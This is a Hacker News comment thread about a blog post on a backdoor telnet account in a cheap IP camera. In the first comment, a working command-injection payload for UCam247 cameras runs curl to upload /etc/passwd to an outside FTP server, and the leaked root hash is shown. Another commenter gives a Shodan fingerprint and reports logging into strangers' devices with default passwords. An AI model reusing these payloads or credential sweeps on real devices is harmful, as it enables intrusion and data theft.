
How I hacked my IP camera, and found this backdoor account - dsr12
http://jumpespjump.blogspot.com/2015/09/how-i-hacked-my-ip-camera-and-found.html?m=1
======
lol768
The UCam247 cameras are vulnerable to a similar attack, you can use a closing
quote in the "HTTP Alarm/Periodic Sending" URL field and since this isn't
escaped (and is run at the shell), you can use a URL like this:

    
    
      http://127.0.0.1" |sh -c "curl -u user:pass --upload-file /etc/passwd ftp://myserver.com//tmp/ 2>&1
    

Which gets you this:

    
    
      /etc/passwd – root:$1$rnjbbPTD$tR9oAIWgUp/jRrhjDuUwp0:0:0:root:/root:/bin/sh
    

I haven't been able to crack the password though yet so I'm guessing it's
somewhat secure. The good news is that you can only enable telnet via the
config file backup/restore system (and it's disabled by default):

    
    
      [telnetd]
      ENABLE=disable
      PORT=60628
    

The other neat thing about the UCam247 cameras is that they also run the
GoAhead Embedded Web Server (which has some fun vulnerabilities,
[http://www.cvedetails.com/vulnerability-
list/vendor_id-1641/...](http://www.cvedetails.com/vulnerability-
list/vendor_id-1641/product_id-2833/Goahead-Goahead-Webserver.html)). My
favourite thing to do with this webserver is to append a backslash to the end
of a URL, e.g.
[http://192.168.1.2/en/main.asp%5C](http://192.168.1.2/en/main.asp%5C) \- the
webserver will simply return back the source code for the page instead of
interpreting it.

------
Animats
Why do they even bother with a backdoor? In normal operation, it communicates
to the "cloud", really some server in China, so mobile devices can get to
them. It's not clear if the images themselves go there, or just setup to get
through DHCP servers.

Think about that. Somewhere, there's a server farm behind this cheap device.
Who's paying for that? The manufacturer? The PLA? It's like when Microsoft
bought Skype and made all the video go through Microsoft's servers. There's no
benefit to Microsoft in that, but someone wanted access to that video.

~~~
halviti
A backdoor is not for normal operation.

Backdoors like these (when intentional) are for when the device is not
functioning as it should, or the user messed up the device, and now it needs
to be repaired by someone.

I'm not defending this practice by any means, as it's a perfect example of why
not to do this, but the root user was more likely intended for system
maintenance rather than remote viewing of a functioning system.

Also, you misunderstand the server component. It's most likely just a name-
resolution service that allows the device to phone home to allow connections
back through your firewall/router.

If they were sucking up all your video data, the latency would be huge, the
costs would be exponential for the manufacturer, and it would be a huge point
of failure.

------
Phil_Latio
Search on shodan.io for

>GoAhead 5ccc069c403ebaf9f0171e9517f40e41

yields 132,000 devices.

Testing about 100 hosts with admin:123456 gave me 3 working cams. Not all
found devices are cams though. Some allow login with admin:admin and are
routers.

I love this stuff.

~~~
atmosx
shodan.io is so cool that should be illegal. Gaining remote access should not
be so _easy_ but apparently it is =)

------
lucb1e
> There is an undocumented telnet port on the IP camera, which can be accessed
> by default with root:123456, there is no GUI to change this password, and
> changing it via console, it only lasts until the next reboot. I think it is
> safe to tell this a backdoor.

Backdoor? This is way too obvious for a backdoor. If I wanted a backdoor in my
IP camera product, I'd modify the source of a tool I have to (cross-)compile
anyway. Say I have to compile my own kernel for this device already, I could
add some port knocking which then throws back a live stream upon the last
knock. Or if I have to compile the webserver software, I would add it in
there. All but impossible to come across if you're not looking for it - and
even if someone were, it would be beyond most people's skills.

An additional open port, especially with a password like that, is way too
obvious to be a serious back door. Even if you go for the theory that they
made this backdoor to make it not look like a backdoor, it doesn't make sense:
the device is probably going to be behind NAT, better to put a hidden URL or
something on the already-reachable webserver port.

------
croon
Am I weird if I'm more more inclined to buy this specific non-brand camera now
that the author has done all the legwork on it?

The devil you know and all that.

------
discardorama
What would have happened if he just did a "mv /etc/passwd /etc/xyz" instead?
What happens when the system does not have an /etc/passwd? (I'm too lazy to
boot up a VM and check it out). Could he just login as root then, without
password?

~~~
mahouse
As far as I know, if there is no /etc/passwd, there is no root account at all,
so you can't log in.

------
nadams
This is why you should always be careful about black-box devices that you
connect to the internet. It's convenient but extremely risky.

I just discovered that AstroBox runs their web service as root!

------
ksml
I'm not convinced this is an intentional backdoor... Do not attribute to
malice what can be attributed to stupidity

~~~
hanlonbclarke
Any sufficiently advanced stupidity is indistinguishable from malice.

------
natch
If you're looking for a better option, Homeboy is a very nicely done battery
powered smart camera that only records when there is motion.

It only activates when you are not home, which it can tell if you install its
app on your cell phone.

I haven't looked for back doors but they are in Australia and they seem not
very sketchy at all.

~~~
monochromatic
1\. Maker is Australian instead of Chinese

2\. They "seem not very sketchy"

3\. ∴ device is secure.

Logic checks out.

~~~
natch
Except I never said the device was secure.

~~~
xg15
What do you mean then with "better option"?

~~~
natch
I mean it's a more trustworthy and less sketchy product than one from a
company that installs back doors, and which comes from a country with a
draconian political system and utterly idiotic government policies regarding
back doors. Australia probably has some idiotic policies too, but China is a
world leader in stupid when it comes to government interference with user
privacy and human rights, so that sets the tone, intentionally or not, with
companies there that this kind of thing is OK. So, yes, the better option
would be to buy from a company based in a more open, more relatively
democratic, society with better respect for users and their rights.

And, Homeboy has a bug bounty program for people who uncover and report
security problems, so, there's that.

So, that's what I mean. Did that clear it up for you xg15?

------
jand
I don't know if the image in the articale is of symbolic nature - anyway - the
small black censorship rectangle does not pose a problem to google reverse
image search.

So if the author really cares about the company (or the implied company), this
image does not help his case.

EDIT: Oh, neither do the comments on the article page.

